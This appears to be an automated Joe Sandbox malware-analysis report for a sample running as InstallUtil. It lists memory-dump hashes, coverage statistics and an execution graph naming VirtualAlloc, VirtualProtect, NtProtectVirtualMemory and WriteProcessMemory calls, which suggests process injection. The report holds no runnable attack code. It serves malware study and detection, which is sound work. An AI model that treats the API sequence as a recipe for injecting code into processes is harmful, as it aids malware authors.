                                                              • Opcode Fuzzy Hash: 4dacb94b2ee8af9ba85bc67cd9590d4110d9e352c9053c7a49db7fc629ac6714
                                                              • Instruction Fuzzy Hash: F8513474E002288FDB14DFA9E885B9DBBB1FF48314F15921AE815BB390DB74A844CF95
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2323888690.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_e20000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 475329593f405ce87aff3b97815051973a0b986107f6fc384485c6d83857ff92
                                                              • Instruction ID: 92bf204c298f206a69b892be25d31341f07e1dd3d3291e13548f53ce54f59259
                                                              • Opcode Fuzzy Hash: 475329593f405ce87aff3b97815051973a0b986107f6fc384485c6d83857ff92
                                                              • Instruction Fuzzy Hash: 14410E31B002158FDB19AB38E55466E3BB6FB89708B24557CD006EB385EE79CD42CBE0
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2323888690.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_e20000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b3948cc41bd4253c996f511456cf3bf2f118cf055be19e42309b431e8eec1b4e
                                                              • Instruction ID: e69b11a1966e68a307404b43288815569324a6d8b1f13dc73ab804eeff0de86e
                                                              • Opcode Fuzzy Hash: b3948cc41bd4253c996f511456cf3bf2f118cf055be19e42309b431e8eec1b4e
                                                              • Instruction Fuzzy Hash: 7741D231206282CFCB09FF29FE909453FA1FB91309784596ED1049FA7EEA746A05CF90
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2323888690.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_e20000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: aed267c4a6cc992f46ccff81b2523d059721968fb514024ac1b80d3bb7244d10
                                                              • Instruction ID: 628d9f74599ddad7d2e17566f56dd15097218b64ae81c835a654ff1d80a2bde0
                                                              • Opcode Fuzzy Hash: aed267c4a6cc992f46ccff81b2523d059721968fb514024ac1b80d3bb7244d10
                                                              • Instruction Fuzzy Hash: C541DF30206282CFCB09FF29FE909457FA1FB91709384596ED1049FA7EEA746A05CF90
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2323888690.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_e20000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 76bdd6694c1a54927c6ccb276b280cbf696b1fce0780cad497af0ea9a3e831b0
                                                              • Instruction ID: 5f9521d3ca1abad3b893d6a7ead58175abb1e4da2900e9831f96be6c50db725c
                                                              • Opcode Fuzzy Hash: 76bdd6694c1a54927c6ccb276b280cbf696b1fce0780cad497af0ea9a3e831b0
                                                              • Instruction Fuzzy Hash: 10319031E1021A9BDB19DF65D99469EBBB2FF88304F108939E816F7390DB70AC45CB50
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2323888690.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_e20000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b692fd6c073012dd22cdd0665eed189278933015bad2d344365f62a8e5d6239a
                                                              • Instruction ID: 15e901e53241f252d34667a9e1586ceb7e835f5e1fe756ece1a360e61e1ced70
                                                              • Opcode Fuzzy Hash: b692fd6c073012dd22cdd0665eed189278933015bad2d344365f62a8e5d6239a
                                                              • Instruction Fuzzy Hash: 9E315E34E1061A9BDB19DF64D99469EB7B2BF89304F108939E816F7390DB70AC45CB50
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2323888690.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_e20000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: aef92b60b4892b47d3530b4419693b5986b751e40157fdb16b444930b486cc4d
                                                              • Instruction ID: 1f3af0595aec5b9aaec26dc6d5c63310d3c0c23c94e5fcf554eb7b1ba0e7b207
                                                              • Opcode Fuzzy Hash: aef92b60b4892b47d3530b4419693b5986b751e40157fdb16b444930b486cc4d
                                                              • Instruction Fuzzy Hash: 444102B0D00349EFDB10CFA9D984ADEBBF1BF48314F24802AE909AB254DB759945CF90
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2323888690.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_e20000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d71ab8134997a105f9ade769d5b31a8e863b4cd782675be1343f9881044338f4
                                                              • Instruction ID: d673f047d4fda208918b28ee6b65d1c810645bfc246f72702b95547a4c7e8b2f
                                                              • Opcode Fuzzy Hash: d71ab8134997a105f9ade769d5b31a8e863b4cd782675be1343f9881044338f4
                                                              • Instruction Fuzzy Hash: FD41E1B0D00349EFDB10DFA9D984ADEBBF5BF48314F20802AE509AB254DB75A945CF90
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2323888690.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_e20000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 28e0247626c2c4e69511449e1b981fae4541fe8e8a63ab434d46f85564b936c4
                                                              • Instruction ID: 86481a26a6e10752d49d79b033c7e8d39feac10687b240e33b148bb647126404
                                                              • Opcode Fuzzy Hash: 28e0247626c2c4e69511449e1b981fae4541fe8e8a63ab434d46f85564b936c4
                                                              • Instruction Fuzzy Hash: B3218034701215CFD705EBB4E458A2E77A7FFC8304B608468E5068B3A9CE719D42CB50
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2323888690.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_e20000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 12133c9de98e0c1388b3ac76f46bb6c5e5eea05373f3e448630af4b87c8e5146
                                                              • Instruction ID: f086861cd1aaee5a2f4c729ffe94ba24b1d5fd862ccf04a4e988db85311b8f87
                                                              • Opcode Fuzzy Hash: 12133c9de98e0c1388b3ac76f46bb6c5e5eea05373f3e448630af4b87c8e5146
                                                              • Instruction Fuzzy Hash: DA315031E002169BDB05CF64E5906DEB7B2FF89304F50D629E405FB291DB709C86CB50
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2323888690.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_e20000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c75cbb8b8f0c81e6e1071e86e6f0a1e4fc79ca5a4947b6e93b503507a0a0af6a
                                                              • Instruction ID: 75e01108da3a42c020e1b1d7dc69d0e6179f6842cbee2d57b4cddb19005ccecf
                                                              • Opcode Fuzzy Hash: c75cbb8b8f0c81e6e1071e86e6f0a1e4fc79ca5a4947b6e93b503507a0a0af6a
                                                              • Instruction Fuzzy Hash: 06215131E0021A9BDB15DF65E99069EF7B2FF89304F50D529E805FB291DB709C86CB90
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2323888690.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_e20000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 29d82647611b66c0fde18871a16b9235c31667682432642807b08eaa6d72f1cc
                                                              • Instruction ID: 07208ad3333f4711734b7c89715bcc19f6c956bb584997115975eff4cf67612d
                                                              • Opcode Fuzzy Hash: 29d82647611b66c0fde18871a16b9235c31667682432642807b08eaa6d72f1cc
                                                              • Instruction Fuzzy Hash: 0A217435E00619EBDB18CFA4E454ADEB7B1BF89304F50961AE815F7391DB709D41CB50
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2323888690.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_e20000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 79f9cef3244a2c5e6db178b191556f03f68c177da714e49464da9a90e5de384a
                                                              • Instruction ID: 6183b0ace8895b4a0d98e7fdba4af4d17dcbd669c1fba0452a73f70ba0f76c1c
                                                              • Opcode Fuzzy Hash: 79f9cef3244a2c5e6db178b191556f03f68c177da714e49464da9a90e5de384a
                                                              • Instruction Fuzzy Hash: 082107386002118FDF22EB24F94471E3B66E7A170CF502AA9D00AE765EEF78DD408B91
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2323888690.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_e20000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 113a30fbeffa21f529e02c13ed3a4327a70fcf6422ca1a5b8a0a274bffbe933d
                                                              • Instruction ID: 8647103a10a0b2a737e4524e2d7bb8330b5ada34acb921db3dc279f1b0d15486
                                                              • Opcode Fuzzy Hash: 113a30fbeffa21f529e02c13ed3a4327a70fcf6422ca1a5b8a0a274bffbe933d
                                                              • Instruction Fuzzy Hash: 0D212C31700254CFDB54EB78EA58AAD7BF1EF49304F104468E406EB3A1DB759D41CB61
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2323458450.0000000000DDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DDD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ddd000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8bc222894770fb878c29825c0f91b9ed71510dbd0c9b8f16470caf05cd560640
                                                              • Instruction ID: da3bb327e3fbb4bc99c74e009e92a4609ddae045fbe424dac35bf709ae48d0d7
                                                              • Opcode Fuzzy Hash: 8bc222894770fb878c29825c0f91b9ed71510dbd0c9b8f16470caf05cd560640
                                                              • Instruction Fuzzy Hash: 06210075604200EFCF14DF24D980B26BB66EBC8314F24C56EE94A0B396C37AD80ACA71
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2323888690.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_e20000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0c77ad5c64492e8136ac2ee4ee4dfdc9342b70d43b0eecb58a8cabff55c57996
                                                              • Instruction ID: 77ea77c75e5b39c48ae691dac4d999ec2335505c3cecb154c6b5c2a4dcd908c7
                                                              • Opcode Fuzzy Hash: 0c77ad5c64492e8136ac2ee4ee4dfdc9342b70d43b0eecb58a8cabff55c57996
                                                              • Instruction Fuzzy Hash: 33212C30A00268CFDB28EB78E5557AE77F2EB59305F2014A8D101FB395DB759E41CBA1
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2323888690.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_e20000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e1ce6e813417bfa5429bc9ddf76b5ab3b444974bcc19c7e811ed243d7f80c22d
                                                              • Instruction ID: 738021e1c5d4b43256e6212214fc2b4bc5c763db7d836993c81d5aa77f8c75ff
                                                              • Opcode Fuzzy Hash: e1ce6e813417bfa5429bc9ddf76b5ab3b444974bcc19c7e811ed243d7f80c22d
                                                              • Instruction Fuzzy Hash: 28219531E00619DBDB18CFA4E4549DEB7B2BF89300F10951AE815FB391DB709C41CB50
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2323888690.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_e20000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cb872b7c75569c44ca7e6c30135127388b66e99d2a79bdfd43971da7d64478a9
                                                              • Instruction ID: 7cafbbaac8592c4d078289ae899e984fe9f1ed81d037f0d1a89d06cb6660ddd8
                                                              • Opcode Fuzzy Hash: cb872b7c75569c44ca7e6c30135127388b66e99d2a79bdfd43971da7d64478a9
                                                              • Instruction Fuzzy Hash: 8C210F309002608BDF36A728F54832D3752F76231DF5119ADE00BE778ADB29DE858796
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2323888690.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_e20000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2b8fed2eb73b8c77ab7e51d0399e25af77be7bd33eb88da1780d3a68c1189cb3
                                                              • Instruction ID: 90fd9778e0421512264a1539b0984bae419bef0eb70038cb3285925f437dd0b7
                                                              • Opcode Fuzzy Hash: 2b8fed2eb73b8c77ab7e51d0399e25af77be7bd33eb88da1780d3a68c1189cb3
                                                              • Instruction Fuzzy Hash: 34213C30B00268CFDB18EB78E5546AE77F2AB99305F2014B8D106FB394DB759E41CB91
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2323888690.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_e20000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: dbfe936b4c60ce136508bae2df00b28df27738c3bc61d7320ae1b93b969db54d
                                                              • Instruction ID: 560f29094ac570438fa0752477def43867dde4701922d4cad30ff5f85c7eb3a8
                                                              • Opcode Fuzzy Hash: dbfe936b4c60ce136508bae2df00b28df27738c3bc61d7320ae1b93b969db54d
                                                              • Instruction Fuzzy Hash: 572108386001118FDF22F724F984B1D3B9AE79571CF506A69D00ADB65DEE78DD408B81
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2323888690.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_e20000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: de8c638521f8ab195738fbe49b6af71a012b4f077eaf944f08355513aadf35c9
                                                              • Instruction ID: c0b2ad62efcd2c9e3b38d08dd1f65b2da1dae915e92ea3b4666678f4367b4fde
                                                              • Opcode Fuzzy Hash: de8c638521f8ab195738fbe49b6af71a012b4f077eaf944f08355513aadf35c9
                                                              • Instruction Fuzzy Hash: 581106326042609FC716AB7CE4257AE3FA2EFC6304F14566ED005CB292EE758845CB91
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2323888690.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_e20000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 912198d95f14adc77eb102eeb3bd91a0c0a634277f144d8ca10077b028d7b8ae
                                                              • Instruction ID: 77b1f7ea07bac6066f6bbf74b1005dd80ff03309994b8365e82d63f99e378acd
                                                              • Opcode Fuzzy Hash: 912198d95f14adc77eb102eeb3bd91a0c0a634277f144d8ca10077b028d7b8ae
                                                              • Instruction Fuzzy Hash: FD213930700214CFDB54EB78EA58AAE7BF1EF88305F104468E406EB3A1DB759E41CBA1
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2323458450.0000000000DDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DDD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ddd000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7511ffe03f0211187ceef1acac2d36e733af31653cfcdb71a9152f33703129a4
                                                              • Instruction ID: ea100601d2566d836012b156614df1d3a5c50b4430b81a5e48d1712f5b4e4739
                                                              • Opcode Fuzzy Hash: 7511ffe03f0211187ceef1acac2d36e733af31653cfcdb71a9152f33703129a4
                                                              • Instruction Fuzzy Hash: 462153755093C08FCB12CF24D994715BF71EB46314F29C5EBD8498B6A7C33A980ACB62
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2323888690.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_e20000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b9b354b072a561f4fd85b1c93413342f9d67877d21167708876a6f1ad6013c8d
                                                              • Instruction ID: 485b39b8e0129dbe338613d5ad42b357b3e60456a462149d48161ca887f09198
                                                              • Opcode Fuzzy Hash: b9b354b072a561f4fd85b1c93413342f9d67877d21167708876a6f1ad6013c8d
                                                              • Instruction Fuzzy Hash: 37119431B002298BEF1C5B79E80476B3691FB85718F605539D106EF3CBDA65CC818BD1
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2323888690.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_e20000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2430d053de44108db2786ca6fc526029121d1b14cea9acbe09305ae50585f0b8
                                                              • Instruction ID: 66290bb6be69603e2c59f59ec708e6bfe79518fd799bfd5dd307ee6576cb929e
                                                              • Opcode Fuzzy Hash: 2430d053de44108db2786ca6fc526029121d1b14cea9acbe09305ae50585f0b8
                                                              • Instruction Fuzzy Hash: E811E331A003288BEF2C5A65B80476B3651E791318F64693AD106EB2C7EA24CC408BD1
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2323888690.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_e20000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f4d56d8d2a90b69b7bdd0c6a3fcf8efb803cf5ae4b02af30cf2e66712684dd84
                                                              • Instruction ID: eeb2ff8c844e19fd89379b3124e42d319eeec0682b0c59aae53cd95e4ec7eede
                                                              • Opcode Fuzzy Hash: f4d56d8d2a90b69b7bdd0c6a3fcf8efb803cf5ae4b02af30cf2e66712684dd84
                                                              • Instruction Fuzzy Hash: DC112576F012618FCB25AB74B84865F7BF5FB88354B100665E906E3345EB30DA0287D1
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2323888690.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_e20000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 01c7f85f6934ce0b3eed6bcbbc440613768f314cbb3bb0af762f4112cbb4d0f1
                                                              • Instruction ID: ecdfe26ceb20713cebf6aabdfc5200efd0a86f974118a3df46fd203265fbb43d
                                                              • Opcode Fuzzy Hash: 01c7f85f6934ce0b3eed6bcbbc440613768f314cbb3bb0af762f4112cbb4d0f1
                                                              • Instruction Fuzzy Hash: A6115E31E002258BCF21FFB899411AEBBF5EB58318B2514BAD419F7342E635DE41CB91
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2323888690.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_e20000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3f48d74415f182484c482e67a020bcec255f18fcd67f1bd0d4f8e69ca203393e
                                                              • Instruction ID: 69597f93849e6cf25673816916754c6281c829cfc19edc889f4a23dcbfb4d9c7
                                                              • Opcode Fuzzy Hash: 3f48d74415f182484c482e67a020bcec255f18fcd67f1bd0d4f8e69ca203393e
                                                              • Instruction Fuzzy Hash: CD018031E002258BCF21EFB899411ADBBF5EB58318B2514BAD809F7342E735DE41CB91
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2323888690.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_e20000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bed4c0a33070ec93262626df863b79a1bdf2ce9bd729ac2d48c50e689345d202
                                                              • Instruction ID: 6bd1f9fd0c61f5adb9620b30fc1afe9236eb6c2360c45adf6f134545cf0b1709
                                                              • Opcode Fuzzy Hash: bed4c0a33070ec93262626df863b79a1bdf2ce9bd729ac2d48c50e689345d202
                                                              • Instruction Fuzzy Hash: 8601627090114AEFEF49FBA8FA8178C7BB1EB80704F90456CC548B7259EF746E059791
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2323888690.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_e20000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f841eee8478e6d63427a9b0d4e741cbb8ea9c812112d478b763663c403cf3ef0
                                                              • Instruction ID: 2b25cf98b789006128534e25ad9fa9a638af846b39b9e1e10f80fbcae4e2a6c4
                                                              • Opcode Fuzzy Hash: f841eee8478e6d63427a9b0d4e741cbb8ea9c812112d478b763663c403cf3ef0
                                                              • Instruction Fuzzy Hash: 94F03130A0014AEFDF09FFA8FA41A9DBBB1EB80704F50556CC508AB259EF742E049B91
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2323888690.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_e20000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a7b6a1bcf451f0663e4b59db971bc9b14404e01fdc3bf8c6496b4052d9e81a76
                                                              • Instruction ID: 41b6bd9da12013a44a4dc32006876b6fdb09530575b49d9345ea9b285daf5503
                                                              • Opcode Fuzzy Hash: a7b6a1bcf451f0663e4b59db971bc9b14404e01fdc3bf8c6496b4052d9e81a76
                                                              • Instruction Fuzzy Hash: 31F02712A09378CAEF3595602814235B6409BE1335F48205ED68EE7283E1418C98E3F2

                                                              Execution Graph

                                                              Execution Coverage:12.1%
                                                              Dynamic/Decrypted Code Coverage:97.5%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:316
                                                              Total number of Limit Nodes:13
                                                              execution_graph 47509 5c2ea90 47510 5c2ead4 VirtualAlloc 47509->47510 47512 5c2eb41 47510->47512 47453 2336690 47454 23366ad 47453->47454 47455 23366bd 47454->47455 47458 5c25b91 47454->47458 47461 5c28bbf 47454->47461 47465 5c2d3e8 47458->47465 47462 5c28bde 47461->47462 47464 5c2d3e8 VirtualProtect 47462->47464 47463 5c28c05 47464->47463 47466 5c2d40f 47465->47466 47469 5c2d8c8 47466->47469 47470 5c2d911 VirtualProtect 47469->47470 47472 5c25bac 47470->47472 47513 5a3dad0 47514 5a3db1f NtProtectVirtualMemory 47513->47514 47516 5a3db97 47514->47516 47110 5a50ea0 47111 5a50eb5 47110->47111 47114 5a510dc 47111->47114 47116 5a510e2 47114->47116 47115 5a50ecb 47116->47114 47116->47115 47117 5a3f2d3 VirtualProtect 47116->47117 47118 5a3f28b VirtualProtect 47116->47118 47119 5a3f2d8 VirtualProtect 47116->47119 47117->47116 47118->47116 47119->47116 47120 5a581b0 47121 5a581c5 47120->47121 47129 5a58487 47121->47129 47133 5a5837a 47121->47133 47137 5a58262 47121->47137 47141 5a581f0 47121->47141 47145 5a581e0 47121->47145 47149 5a58477 47121->47149 47122 5a581db 47131 5a58247 47129->47131 47130 5a582dd 47130->47122 47131->47130 47153 5a595a9 47131->47153 47135 5a58247 47133->47135 47134 5a582dd 47134->47122 47135->47134 47136 5a595a9 9 API calls 47135->47136 47136->47135 47139 5a58247 47137->47139 47138 5a582dd 47138->47122 47139->47138 47140 5a595a9 9 API calls 47139->47140 47140->47139 47143 5a5821a 47141->47143 47142 5a582dd 47142->47122 47143->47142 47144 5a595a9 9 API calls 47143->47144 47144->47143 47146 5a581f0 47145->47146 47147 5a582dd 47146->47147 47148 5a595a9 9 API calls 47146->47148 47147->47122 47148->47146 47151 5a58247 47149->47151 47150 5a582dd 47150->47122 47151->47150 47152 5a595a9 9 API calls 47151->47152 47152->47151 47154 5a595cd 47153->47154 47158 5a596d6 47154->47158 47163 5a598ce 47154->47163 47159 5a596ee 47158->47159 47168 5a59db0 47159->47168 47202 5a59dc0 47159->47202 47160 5a59673 47164 5a596d5 47163->47164 47165 5a59673 47163->47165 47166 5a59db0 9 API calls 47164->47166 47167 5a59dc0 9 API calls 47164->47167 47166->47165 47167->47165 47169 5a59dd5 47168->47169 47236 5a59fe4 47169->47236 47240 5a5a1db 47169->47240 47246 5a5a658 47169->47246 47254 5a5aa52 47169->47254 47258 5a59f13 47169->47258 47262 5a5a3ca 47169->47262 47267 5a5a58a 47169->47267 47272 5a5a709 47169->47272 47278 5a5a703 47169->47278 47282 5a5ac80 47169->47282 47286 5a59f40 47169->47286 47290 5a5a385 47169->47290 47294 5a5a485 47169->47294 47298 5a5a47a 47169->47298 47302 5a5a27b 47169->47302 47306 5a5abbc 47169->47306 47310 5a5a531 47169->47310 47314 5a5aa76 47169->47314 47318 5a5ab77 47169->47318 47322 5a5a169 47169->47322 47326 5a5a9ac 47169->47326 47330 5a5a862 47169->47330 47335 5a5ade2 47169->47335 47339 5a5ada2 47169->47339 47343 5a5aaa0 47169->47343 47347 5a5a2e1 47169->47347 47351 5a59f61 47169->47351 47358 5a5a7e7 47169->47358 47362 5a5a867 47169->47362 47366 5a5ae67 47169->47366 47373 5a5a427 47169->47373 47170 5a59df7 47170->47160 47203 5a59dd5 47202->47203 47205 5a59fe4 2 API calls 47203->47205 47206 5a5a427 2 API calls 47203->47206 47207 5a5ae67 2 API calls 47203->47207 47208 5a5a867 2 API calls 47203->47208 47209 5a5a7e7 WriteProcessMemory 47203->47209 47210 5a59f61 4 API calls 47203->47210 47211 5a5a2e1 2 API calls 47203->47211 47212 5a5aaa0 2 API calls 47203->47212 47213 5a5ada2 2 API calls 47203->47213 47214 5a5ade2 2 API calls 47203->47214 47215 5a5a862 2 API calls 47203->47215 47216 5a5a9ac 2 API calls 47203->47216 47217 5a5a169 2 API calls 47203->47217 47218 5a5ab77 2 API calls 47203->47218 47219 5a5aa76 2 API calls 47203->47219 47220 5a5a531 2 API calls 47203->47220 47221 5a5abbc 2 API calls 47203->47221 47222 5a5a27b 2 API calls 47203->47222 47223 5a5a47a 2 API calls 47203->47223 47224 5a5a485 2 API calls 47203->47224 47225 5a5a385 2 API calls 47203->47225 47226 5a59f40 2 API calls 47203->47226 47227 5a5ac80 2 API calls 47203->47227 47228 5a5a703 2 API calls 